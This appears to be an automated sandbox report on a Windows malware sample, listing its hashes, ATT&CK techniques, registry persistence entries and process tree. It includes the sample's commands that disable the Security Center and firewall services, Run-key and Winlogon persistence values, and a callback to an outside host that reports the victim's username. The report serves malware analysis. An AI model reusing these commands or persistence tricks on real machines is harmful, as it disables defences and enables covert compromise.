1fab73b02d8169d46a2dc424d3b7cc6d6b54867d4264e304cea98a07daa1fe65

Analysis

max time kernel
84s
max time network
147s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07/09/2024, 21:48

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe
Size

32KB
MD5

d2e7e4696b554b4350775d88cafe0fb2
SHA1

db2f0964be217d319f93571d941e0e80e2b29ece
SHA256

1fab73b02d8169d46a2dc424d3b7cc6d6b54867d4264e304cea98a07daa1fe65
SHA512

e10d1ab7d4110302305638c69cd0d4b190a1bc7e08c008dab02c61bff4bceba87464958d60e8ff0063c3f313cf3521c859e33486c00d7db74205318d642cce72
SSDEEP

384:OYaZCrnwTJ1HY0jqkiQcVVnsShIZnCiZn:ORJ1HY3n3IZnCEn

Score

10^/10

discovery evasion execution persistence

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe \"c:\\winlogon.exe\""	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe

Modifies service settings 1 TTPs
Alters the configuration of existing services.
evasion

Windows Service
T1543.003
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "c:\\winlogon.exe"	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2304	sc.exe
2916	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe

Modifies Internet Explorer settings 1 TTPs 32 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000078a0cc6b0b830b4fbbc12dd3fac6f54200000000020000000000106600000001000020000000e69573b284c56773c7280b7ffbcacbbdc4389581dce30662c8898c41385863d0000000000e80000000020000200000000782672aefd8b45bf16d4ba58f972a35d1adf1480b336964883ee65bebb9842320000000b3790078e74fc9c28464da11da542814e42dd89e4f2927feabf65cdd47b78f024000000003372a1e3ecebdc653f023c5de0694504735c9a65bd92d8cfc85a920911428b1c78684ee9bcd2ac30dc5cc6df1591fe960c95515f14255838baef6f2a7f8d212	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20782ed26f01db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FC165F91-6D62-11EF-B12A-E61828AB23DD} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000078a0cc6b0b830b4fbbc12dd3fac6f5420000000002000000000010660000000100002000000090b471c54a3d347b27543a031593cba1a5581d016496b01e37c6e406b666756f000000000e8000000002000020000000a6c4de22a399e570f3d6b2b6238ec00c8b4a5184f30e556b0be68c7488328536900000002bf72212ac9674551f0ca3d2a1037adac63e95b35a8047fd3544f3769839053a34f4657fc177d0c18948187b541a5f8c5cf6b3dbc161e5323838a8647643d82bca25d6d88b187b528d06a59ecd644f57e8d3ecc98ee3d69d1896ee28c55d4fca809ebc73d6ce0de1858f6926cbb62de3bef80e1408d163f7b101cd91ef10f32a92dc1433a59b41e4f2e6e697780618d64000000036bab1481e5659c1c41a8a3dcff68a1fcba1c4d88667aefccdb71489095a31f4575f9307855eff7daccda1bb9537bb19dcf30fc8f91f165b58ecc3a58404ae4f	iexplore.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2368	iexplore.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe
1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe
2368	iexplore.exe
2368	iexplore.exe
2556	IEXPLORE.EXE
2556	IEXPLORE.EXE
2556	IEXPLORE.EXE
2556	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1884 wrote to memory of 1704	1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe	30
PID 1884 wrote to memory of 1704	1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe	30
PID 1884 wrote to memory of 1704	1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe	30
PID 1884 wrote to memory of 1704	1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe	30
PID 1884 wrote to memory of 496	1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe	32
PID 1884 wrote to memory of 496	1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe	32
PID 1884 wrote to memory of 496	1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe	32
PID 1884 wrote to memory of 496	1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe	32
PID 1884 wrote to memory of 2368	1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe	33
PID 1884 wrote to memory of 2368	1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe	33
PID 1884 wrote to memory of 2368	1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe	33
PID 1884 wrote to memory of 2368	1884	d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe	33
PID 2368 wrote to memory of 2556	2368	iexplore.exe	35
PID 2368 wrote to memory of 2556	2368	iexplore.exe	35
PID 2368 wrote to memory of 2556	2368	iexplore.exe	35
PID 2368 wrote to memory of 2556	2368	iexplore.exe	35
PID 496 wrote to memory of 2304	496	cmd.exe	37
PID 496 wrote to memory of 2304	496	cmd.exe	37
PID 496 wrote to memory of 2304	496	cmd.exe	37
PID 496 wrote to memory of 2304	496	cmd.exe	37
PID 1704 wrote to memory of 2916	1704	cmd.exe	36
PID 1704 wrote to memory of 2916	1704	cmd.exe	36
PID 1704 wrote to memory of 2916	1704	cmd.exe	36
PID 1704 wrote to memory of 2916	1704	cmd.exe	36

C:\Users\Admin\AppData\Local\Temp\d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\d2e7e4696b554b4350775d88cafe0fb2_JaffaCakes118.exe"
1⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1884
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc stop wscsvc sc config wscsvc start=disabled
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Windows\SysWOW64\sc.exe
    sc stop wscsvc sc config wscsvc start=disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2916
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc stop sharedAccess sc config sharedAccess start=disabled
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:496
- - C:\Windows\SysWOW64\sc.exe
    sc stop sharedAccess sc config sharedAccess start=disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2304
- C:\Program Files\Internet Explorer\iexplore.exe
 "C:\Program Files\Internet Explorer\iexplore.exe" http://choxie.ch.funpic.org/update.php?datos= ...:::.9/7/2024 9:48:58 PM:::... Instalacion Completa &user=Admin
 2⤵
 - Modifies Internet Explorer settings
 - Suspicious use of FindShellTrayWindow
 - Suspicious use of SetWindowsHookEx
 - Suspicious use of WriteProcessMemory
 PID:2368
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
 "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2368 CREDAT:275457 /prefetch:2
 3⤵
 - System Location Discovery: System Language Discovery
 - Modifies Internet Explorer settings
 - Suspicious use of SetWindowsHookEx
 PID:2556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a78eab49e77437f7fc84a3622e50751d

SHA1
48a4282cc460657de870d9e0d55f6d5f903e76d8

SHA256
b4aa01d85f30b20e3e505b71613a144d250e40c43178f14a0603807022e47d80

SHA512
e981a4556af75f7bff887f6b7f1d2838cff628b57857c4663e4f6fb037923ed684c7600b6832c0508d2c437ec2de2fa90a61f4c537a7c83ed6f080214dbdcbf9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4cbb833afacff7831bf99bfedeb91b8f

SHA1
824a5caff1adc45f4713478f5bc76e7a60ef2420

SHA256
6c4389832d45f9fe60ded8594fe87d8f353215bc9e810bcbd015c14c46d0c018

SHA512
94ceea8d08168a7817a5286edf63efb3b40bd82fdb4addd3e39d2387d8c4231e768d0a595e9fa694978991a6e652b102faa05c6d36ae46b5c47982d86e3918ca

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
294d273dc697bce7237d5fcd3dfcbce3

SHA1
123ff1eba98729b797de586c0b691a0cfbd2b828

SHA256
5055eb9a0f8088c5fe8d98748388f07a66127672111244e3064cfdb21258d8b9

SHA512
b35c6ed00c9aa97aa8354bc97067e4a747daa067df0f2c20e8a0f5e1a4c7f1535da0a1bd48238e092798c47fc670c71cd6c862f84a35329011d24585274a7c4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d53bb515675872a6508b1e71c9d544a4

SHA1
afcf1eb32e601aece7a215e4ed7937cde38f8664

SHA256
3d676332449dda0c02a337ed5e476605866b4348e851230473a17abaa78270e9

SHA512
3636ade8ac6a39ace645794c4a60c95fc96d356cc9db17045b8136b0ef561acfe1aa7b06b8a4492d5b5a1612eaab75c79e35cfd321a819c67a12dc936a2029ec

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c8bcbf6f52a705e54a6c74a1a7c0c682

SHA1
377d0d1d0e5e7866b754f54395e479ee01360d0f

SHA256
9ab13a65001fdbaa0afaa740d8d0bcdb71839c5bbdb927d5626c0ef8233de1c9

SHA512
1fe38c048ce39b62f0eca99683818dcf7277c6ed246286db6e5ad9e37483bfd9a05b8b77fe137fc26d1d2bf577085944b140244e2929616ee393cd403e3b9e88

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
32afc4cc3fc2f6405dbf776672ac8e49

SHA1
7225f44196b297896a6e3981d74dea18bc8bd1c6

SHA256
46eae8da6c1e260da7b9d7b7ee794550003c463bf4407ceffce55c500792e75b

SHA512
e7e119d43e457b21a4478d2c52f8c5bbd1a3ec7bb8c3b4c1b332f462c823fdbf8b47673d8e2199ece1d4babcd9f1cdaf21a28e6f4203e210c2f7a198bee1a24d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b6b44af39c69f2326abb2909b04dd05c

SHA1
aa89fc13f012d08729ee422f3249b46c339bdf7e

SHA256
627f32209e4ed1e3d6293f5b88cab15d4edd6f47d02de3f686bf4a399adfb738

SHA512
44198ae468438143d882a583fd6e9b7fd317ec3e57316cc05fde491be36910d07b0ff2d40ef9190b43add1418946dcd150bc6369d82a5e57299927cdd61affd2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
99c72f02c750431637454ccc871e8f71

SHA1
dd0ee8ecb8439b247ec0cbdc410984c7ff8f1e96

SHA256
1c2729685d0f06035e5c08ba4022d0ced710f6e6624b57704a47ec8ebf444796

SHA512
1817f4876f63a6daf8b15d037e42e19d3680d591d431979dc93934315367d8d9c7463e25ff88124a29db79b5769000e6e45b5431c816fc6c902ddf69ad0f9e6b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7f9088236ac285eaf6977405badfb69c

SHA1
91737634670757503b5d52627aeec2aa9674a863

SHA256
9fc323fe9db0bafbc698a16f397205c147266bf8a39fa39b74313cca0795640b

SHA512
7ed0a876663bb7e4129a68791892724320790071c2d0c8592a6a9a5b27677d2f6d6a6ee612c5ad914fea0d8f71f871f578abbb8d22de97023b2de113deab0e8e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2a1900844048a3021ddbc27b94b19a17

SHA1
55fa9d381837ea556f857df4ca259eb9ec60074a

SHA256
9641a2f5c153e4c04f7bc38bb722d9c3d98656d48d611f51304d4b3ba99c0775

SHA512
b0b928cd8e416fa28743a895cc4936ab6e14f81e30ae5ad55963f76559833bba08bafb865cc21b434d1fb70e72b03a0d6c5bd40f3a5023dd01bcc00e701a418b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1e5cdab92eef7474fc0d83a493d9ba08

SHA1
59eecc5f079549c562d9ef4fb87a7acefa741ba5

SHA256
4e3e7c97db2095ce8961e01b061e9a244d8cfcf7717ff97e4f48dd73de0c2db7

SHA512
77f8ecefa686067c690d64f3a35249ede0f7bbe468e44206f1fcb1302f7d8cfdfe63db76ae0ba72dc82f10768498f5de649cf7e7e040ee10444e3eefbaf6e210

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
41eaba7a05112fba1a1f1481c01ef546

SHA1
81264d174ed7a969e39269f2f5c5490c0fc59e38

SHA256
b95d3c2d5ec41e01f9ba0e17fd97fddaec1698724ec56ccdb45554ee08fa8848

SHA512
7a4f20a7891dfaf7024855824efc91e04396cbf873ec9052bb3b173bcb87ac07b90ab0c9e6dd1b6db4bcbe87ef42db9de4836158451842112ac5ff9025bb1231

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ebb13b87a39f9b99c146bbcfcbd453a0

SHA1
167ee12465751e64454c703f222c6ec36905e06e

SHA256
8988e7167fffda339ad6fb8e8f018519327200225e05edafc7f82a3b18fe33e3

SHA512
2b33efc8335ad812aa3eff953cdcf58abd9f68847a5c27760dc6980f8d6204046774cad6a05cf9ac52b97d789f8b8d663e21e0bc2e969b0fc0eec42f5b45a1fd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0cf845d6d18880bcc1ca69cb4d299933

SHA1
64b46604a00b8206b6c48a77f6fa8cb1f7ae6ac3

SHA256
6a28247e0bb073e8e64aa712fae53e9839ee7214c6a923d8e44c6cdca5039697

SHA512
83cccb49302979dd96de939f742869c4ab6b3a35841197512552a2336afce11510cd64424188dc052e80ae3b6b161a4ac9641b659c607662238e7f0831aeb561

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
dcaaf3612a56eb8df78ba8463cde055d

SHA1
8cd39c28fac35be2d6b0d46b413e4aef87bf3669

SHA256
6c17cb1b8b08989316498bdd88711a0865c53aedf608ff5adcfec9fa3882828f

SHA512
3c2a18f7339a7834221c48ad52d85687da6c8532ed3377afe795f89d3cb1488b9b42d8fea7375b0f627aa19a5b6ebde1d9792ecdf1150e03ced2efe5e1f25174

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b3a8a761bdf88737272086156fed5f5b

SHA1
10d33acc9be4ec37400772e99b9829f08b1b37cc

SHA256
4dfa0b03c4f919cead0aa7a3f58a9840d7c4f1b53a9dd9a87fbf96ca1674a1c0

SHA512
59493aab79b1623e696ba88d5bc104980dff13929574b2982a2f68c6c22206b71a7c6671ce2263fc44124989e558c6dd20c276d38312a803c808bb2a8f4922cf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
af06bbe752a4d8789bd79f285c57dbaa

SHA1
655c75d334f8e91ffce255af174f667dc24f117a

SHA256
29d94b91ec57188bebda6e996ff634d57e9c47d347ea500a3f976c727eeddc98

SHA512
81a6f577c47c50d64d3b9be153fc9cdf626ebb0d06ac0f9af243d45c0db457da21180ec7c1135ee0e58e7e0560d747efe37bbc974cef36d8c8d7452f2965a5b7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5452a333aca7c5e735634795e21db53b

SHA1
e01386f8719b7f4de0f1fa3e6c607cf2b7276705

SHA256
00469ea4ad70633e25f51d8b6a177db7666cb49ffe1db740a27d0ab3b3726c02

SHA512
502ca856b7a310e8e70627a2b71883dc86d11434dfcd65401b84c76c7ffa74bd4d22ec20281cff1cc838d29787ecc14ae1101995f2dbfe5bdf4b70c7e6e469eb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
276fec3d74c71827142532fcdb01aa5f

SHA1
eb04aeff463a6b9920630df5f354ecdcd8a232a2

SHA256
0833098f259ecf3691074f29aa7a4ec0c9bd767345720c3f903890e78f7291a4

SHA512
3b3ac67bbbbe8846d37631e13724454ad04a789dd99d899c273e9b294493867dd51de13ecc049d3e1d995ac9b6a5cabda9cdb11c55ae7a21b4788333546f74fa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9391e39a9c0a328c739cbbca4f26f1ef

SHA1
65857c3357397aba8beb213310155e4d255e9a9b

SHA256
aa44b29a8afa0a60ec0343db76a60163b87c676ec15655ebe20255d56696f6ad

SHA512
780d31345606ea70f33ea40268e7a71524459843cd4e2607bedf3685cda0543f811d4586b1ac53f0f5e5e0fddb79be9b5933f19c88de1ceb3d794eea132c012b

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabC709.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarC77A.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
memory/1884-2-0x0000000002C80000-0x000000000373A000-memory.dmp

Filesize
10.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads